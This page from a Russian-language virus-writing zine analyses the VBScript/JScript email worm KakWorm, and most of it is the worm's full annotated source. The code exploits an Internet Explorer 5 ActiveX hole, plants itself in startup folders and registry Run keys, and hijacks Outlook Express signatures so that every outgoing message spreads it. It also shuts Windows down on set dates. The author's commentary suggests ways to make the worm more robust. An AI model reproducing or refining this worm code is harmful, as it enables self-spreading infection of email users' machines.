- [Duke's Virus Labs #10] - [Page 27] -

Анализ вируса WScript.KakWorm 
(c) by ULTRAS[MATRiX]

Описание
~~~~~~~~

Этот интернет-червь написан на языке Visual Basic Script. Для своего 
распространения червь использует MS Outlook Express. В отличие от большинства 
червей этого класса он не прикрепляет к письму дополнительный файл, а 
встраивает свое тело в подпись пользователя, используемую по умолчанию. 
В результате, когда Outlook Express создает новое сообщение, к нему 
автоматически добавляется подпись, и таким образом все отсылаемые сообщения 
оказываются зараженными. Когда получатель открывает зараженное письмо, скрипт 
червя автоматически получает управление и заражает компьютер.

Червь работает на английской и французской версиях Windows, но не работает, 
если Windows установлена в каталог отличный от "C:\Windows". Для записи своих 
файлов на диск червь использует брешь в защите Internet Explorer 5.0.

Если же на компьютере не установлен Outlook Express либо MS Internet Explorer 5.0, 
червь не сможет заразить компьютер и неспособен к распространению.

1-го числа каждого месяца после 17:00 червь выводит на экран сообщение:

  Kagou-Anti-Kro$oft says not today !

после чего закрывает Windows.

О вирусе
~~~~~~~~

В этом вирусе очень много недостатков... Автор зачем то создавал reg файл?, 
когда это можно было записать сразу в реестр  (с помощью WScript.Shell, 
RegWrite). Потом он использовал c:\windows, хотя у многих виндовый каталог 
по другому называется, можно было просто сделать (GetSpecialFolder(0) - вот 
он каталог виндов).. Но самое главное - не как вирус написан, а идея 
которую вирус несет...


-[ Virus ]---------------------------------------------------------------------------------------------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2722.2800" name=GENERATOR>
<STYLE></STYLE></HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT size=2>Dear Steve, </FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=2>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; I 
also want to ask you another question. When I switch on the computer, I am 
getting an error message saying "Registry editor - Cannot load kak.reg file'. Do 
you know what it means?</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=2>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; Give 
my regards to your parents and brothers and sisters.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=2>Karmenu</FONT></DIV>
<DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC 
id=scr></OBJECT></DIV>
<SCRIPT><!--
function sErr(){return true
}window.onerror=sErr
scr.Reset()
scr.doc="Z<HTML>
<HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize>
</"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>
</"+"object><SCRIPT>function sEr(){self.close()
return true
}window.onerror=sEr
fs=new ActiveXObject('Scripting.FileSystemObject')
// -- это понадобиться в вирусе
wd='C:\\\\Windows\\\\'
// -- метка диры виндов
fl=fs.GetFolder(wd+'Applic~1\\\\Identities')
// -- метка выше указанного каталога (понадобиться для проверки)
sbf=fl.SubFolders
for(var mye=new Enumerator(sbf)
!mye.atEnd()
mye.moveNext())idd=mye.item()
ids=new String(idd)
idn=ids.slice(31)
fic=idn.substring(1,9)
kfr=wd+'MENUDЙ~1\\\\PROGRA~1\\\\DЙMARR~1\\\\kak.hta'
// -- мекта для французкой версий виндов(Автозагрузка)
ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta'
// -- мекта для английской версий виндов(Автозагрузка)
k2=wd+'System\\\\'+fic+'.hta'
// -- метка копий вируса в системном каталоге
kk=(fs.FileExists(kfr))?kfr:ken
// -- проверим есть ли в каталоге автозагрузки копия вируса 
aek='C:\\\\AE.KAK'
// -- метка файла
aeb='C:\\\\Autoexec.bat'
// -- еще одна метка
if(!fs.FileExists(aek)){re=/kak.hta/i
// -- проверим есть ли такой файл
if(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb)
// -- запустим с параметрами
f1.Copy(aek);t1=f1.OpenAsTextStream(8)
// -- скопируем и откроем файл ае.как
pth=(kk==kfr)?wd+'MENUD?~1\\\\PROGRA~1\\\\D?MARR~1\\\\kak.hta':ken
t1.WriteLine('@echo off>'+pth)
t1.WriteLine('del '+pth);t1.Close()
// -- запишем команды в этот файл
}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2)
// -- копируем в системный каталог копию вира
fs.GetFile(k2).Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg')
// -- поставм стандартные атрибуты файлу и откроем его на запись
t2.write('REGEDIT4')
// -- запишем в хедер kak.reg
t2.WriteBlankLines(2)
// -- пропутим 2 строки
ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0'
sg='\\\\signatures'
t2.WriteLine(ky+sg+']')
// -- запишем параметры которые понадобится вирусу
t2.Write('\"Default Signature\"=\"00000000\"')
// -- установим дефаулт сигнатуру
t2.WriteBlankLines(2)
// -- еще 2 строки пропускаем
t2.WriteLine(ky+sg+'\\\\00000000]')
t2.WriteLine('\"name\"=\"Signature #1\"')
t2.WriteLine('\"type\"=dword:00000002')
t2.WriteLine('\"text\"=\"\"')
t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"')
// -- копию вируса отсылаем с письмом
t2.WriteBlankLines(2)
t2.WriteLine(ky+']')
t2.Write('\"Signature Flags\"=dword:00000003')
t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]')
t2.Write('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"')
// -- запишем параметры чтобы вирус загружался при запуски системы
t2.WriteBlankLines(2);t2.close()
// -- закрываем файл
wsh.Run(wd+'Regedit.exe -s '+wd+'kak.reg')
// -- запутим рег файл
t3=fs.CreateTextFile(wd+'kak.htm',1)
// -- создадим в виндовом каталоге копию вира
t3.Write('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr></"+"OBJECT></"+"DIV>')
// -- запигем в нее html header
t4=fs.OpenTextFile(k2,1)
// -- откроем записанную доэтого копию
while(t4.Read(1)!='Z')
// -- цикл чтения
t3.WriteLine('<SCRIPT><!--')
// -- запишем строку что мы используем скрипты в htmlки
t3.write('function sErr(){return true;}window.onerror=sErr
// -- если ошика то zdob shi zdub 
scr.Reset();scr.doc=\"Z')
rs=t4.Read(3095)
// -- прочитаем выше перечисленное кол-во байт
t4.close()
// -- закроем файл
rd=/\\\\/g
re=/\"/g
rf=/<\\//g
rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"')
// -- изменим некоторые параметры в вире
t3.WriteLine(rt+'\"
la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language
// -- проверим язык
scr.Path=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Dйmarrer\\\\\\\\Programmes\\\\\\\\Dйmarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\"
// -- если французкий то kewl, английский тоже пойдет
agt=navigator.userAgent.toLowerCase()
if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(\"msie 5.\")!=-1))scr.write()&')
// -- проверим какая версия Internet Explore... Если 4 то это не для нас, если 5 то супер
t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>')
// -- запишем еще одну маленькую деталь
t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg')
// -- закроем файл, установим аттрибуты,удалим kak.reg
d=new Date()
// -- метка текущей даты
if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !')
// -- если 1-ое число месяца и после 17:00, то выводим на экран сообщение
wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows')
// -- закрываем винды
}self.close()
</"+"SCRIPT>S3 driver memory alloc failed &nbsp; !]]%%%%%</"+"BODY></"+"HTML>"
la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language
scr.Path=(la=="fr")?"C:\\windows\\Menu Dйmarrer\\Programmes\\Dйmarrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta"
agt=navigator.userAgent.toLowerCase()
if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write()
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>
